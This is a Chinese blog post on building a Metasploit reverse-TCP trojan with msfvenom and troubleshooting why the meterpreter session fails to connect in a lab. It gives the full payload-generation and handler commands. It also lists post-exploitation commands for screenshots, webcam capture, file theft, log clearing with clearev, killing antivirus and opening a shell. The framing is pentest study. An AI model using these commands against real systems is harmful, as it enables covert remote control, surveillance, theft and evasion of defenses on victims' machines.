渗透测试/应急演练过程中metasploit制作木马连接失败问题排查

最新推荐文章于 2023-09-21 21:15:54 发布
最新推荐文章于 2023-09-21 21:15:54 发布
阅读量2.9k 收藏 39
点赞数 5
分类专栏: 企业安全 网络安全 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40111182/article/details/118553818
版权

声明:本文仅供学习交流,恶意人员请绕路,

******往期经典
网络安全:
1、HCIE-Security心得
2、华为交换机抓包上传至PC分析
3、ARP Miss攻击处置
4、ARP网关欺骗攻击处置
5、基于wireshark快速定位内网DHCP Server仿冒攻击
6、wireshark过滤使用及常见网络攻击检测过滤
渗透测试:
1、基于brupsuite的web弱口令扫描
2、渗透测试/应急演练过程中metasploit制作木马连接失败问题排查
3、DVWA搭建中遇到的无法连接数据库问题及处理
企业安全:
1、企业网络信息安全意识宣贯——屏保制作
2、记一次勒索病毒攻击事件的处理过程
3、网络信息安全意识宣贯屏保CSDN.pptx
4、网络信息安全意识宣贯屏保CSDN.scr
安全合规:
1、信息安全技术-网络安全等级保护三级测评要求.xlsx
安全事件处置及应急管理:
1、linux抓取僵尸网络进程脚本
2、windows一键关闭高危端口
3、自动关闭高危端口脚本
4、windows server进程内存占用及CPU使用率自动监控并记录脚本
5、网络信息安全应急演练方案 .docx
6、网络信息安全应急演练报告 .docx
7、飞客蠕虫病毒?分析、定位、处理
主机安全:
1、linux抓取僵尸网络进程脚本

msf木马制作

网上有很多教程,比较简单,大致说下步骤:
1 生成木马
在kali控制台输入:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe
  • -p 参数后跟上payload(载体),攻击成功之后,要做什么事情
  • LHOST 后跟监听的IP,kali的ip
  • LPORT 后跟监听的端口,kali监听的端口
  • -f 后跟要生成后门文件的类型

2 在kali上开启postgresql服务

  • /etc/init.d/postgresql status 查看postgresql服务的状态
    在这里插入图片描述
  • /etc/init.d/postgresql start 开启postgresql服务
  • netstat -ntulp 查看端口
    在这里插入图片描述如果postgresql状态未开启,一定先要开启后在进行下边操作。

3 开启MSF
kali下输入命令:msfconsole,进入msf6视图(6代表版本)

1 msf6>use exploit/multi/handler 选择exploits
2 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload
3 show options 查看所需设置的参数
set LHOST 192.168.10.10 设置监听地址
set LPORT 4444 设置监听端口
4 run 或者 exploit

4 靶机运行木马
把制作的111.exe拷贝到靶机上运行。

无连接原因排查

1 靶机跟kali网络连接问题
测试两者网络连通性,确保网络正常

2 postgresql服务未开启
开启msf前先检查一下postgresql状态,或者重启一下postgresql服务。
命令:/etc/init.d/postgresql restart
一直排查不到原因的可以将postgresql服务重启试下,我自己测试连不上就是这个问题,当时用process monitor排查木马进程是否启动,发现靶机网络连接192.168.10.10时状态为disconnect。但是在kali上查看postgresql状态为actice,试着重启了一下postgresql服务就可以了

3 木马ip、端口设置及msf监听的ip、端口设置要一致,且ip均为kali的ip
这个初学者老分不清设置的ip,记住为kali的ip

4 查看靶机木马是否被杀毒软件干掉。
现在杀软也不是吃素的,基础的、简单免杀的都会被干掉,测试前可以先关掉杀软。

简单使用

1 截取屏幕
screenshot
2 启用摄像头拍照
webcam_snap
3 查看目标是否为物理机
run post/windows/gather/checkvm
4 上传文件
upload plhhyjds.jpeg
5 下载文件
download C:\Users\11\Desktop\a.php
‘upload’ 'download’命令从远程机器下载文件。 请注意在提供Windows路径时使用双斜线。
6 查看当前路径
getwd
7 清除日志
clearev
8 结束目标主机上的杀毒软件相关进程
run killav
9 获取控制台权限
shell
10 解决控制台乱码
chcp 65001
11 控制多台电脑
sessions -i (i=1,2,3…)
在这里插入图片描述

LION-WHY
关注
  • 5
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一键windows xp恶意网页木马免疫.cmd
05-02
一键windows xp恶意网页木马免疫.cmd
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
20202411 2022-2023-2 《网络与系统攻防技术》实验二实验报告
01学得好,从入门到吃饱
03-23 347
ARM架构大冤种认清了x86的世界,垂死挣扎一天半完成实验,发现原来是自己想太多找罪受
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 3037
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版,改成了用Ruby语言编写的了。在kali,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
清除病毒后,无法运行程序的解决方法
crystal521(云淡风轻)的专栏
09-15 3029
     毒软件清除某个木马或者蠕虫病毒后,再次运行程序,忽然,你发现.exe的可执行程序都无法正常运行。     原因一般是木马程序修改并接管了EXE文件的关联,因该木马程序被杀毒软件删除导致系统出错不能运行。     解决办法: 找到windows目录下的regedit.exe,在文件图标上单击鼠标右键,选择重命名。将扩展名exe改为com或pif或scr。    然后双击
解决TCP连接不上
qq_43570115的博客
03-11 9252
非常值得看的一篇文章!提供四种针对Tcp连接不上问题的解决办法
解决DVWA(Low级别)国菜刀连接失败问题(php版本问题
myec_lipse的博客
04-22 2430
今天在DVWA平台上上传了个一句话木马,用国菜刀连接了一下发现连接不上,百度了大半天,发现是php版本问题,之前在win7虚拟机上安装的XAMPP7的php版本是php7.x版本的,需要降低一下版本,度娘说降低到5.x版本就可以连接上了(因为啥咱也不知道咱也不敢问)。研究了半天感觉改来改去的太麻烦了就直接下了个XAMPP5,复制了一下XAMPP7的DVWA文件到XAMPP5上,在5的DVWA平台上上传了一个一句话木马,菜刀就能正常连接了,棒呆! ...
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3299
msfvenom的使用
msf安卓远控木马版本不兼容
L125_的博客
01-25 738
关于msf安卓木马问题,求大神看看
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
metasploit使用lnk漏洞渗透测试.doc
03-18
metasploit使用lnk漏洞渗透测试.doc
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南.修订版
09-12
完整扫描版带书签 Metasploit渗透测试指南.修订版Metasploit渗透测试指南.修订版
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
spring java图片上传源码.rar
最新发布
04-26
源码实现了图片上传功能,可供相关功能开发的小伙伴参考学习使用。
新入职员工工作总结范文大全(篇).docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
本项目内容为《SpringBoot 2.X 基础教程》配套源码.zip
04-26
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
IMG_20240426_195457.jpg
04-26
IMG_20240426_195457.jpg
metasploit渗透测试
08-02
Metasploit是一个渗透测试工具,也是信息安全渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LION-WHY

嘿,留下一分钱,谢啦

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值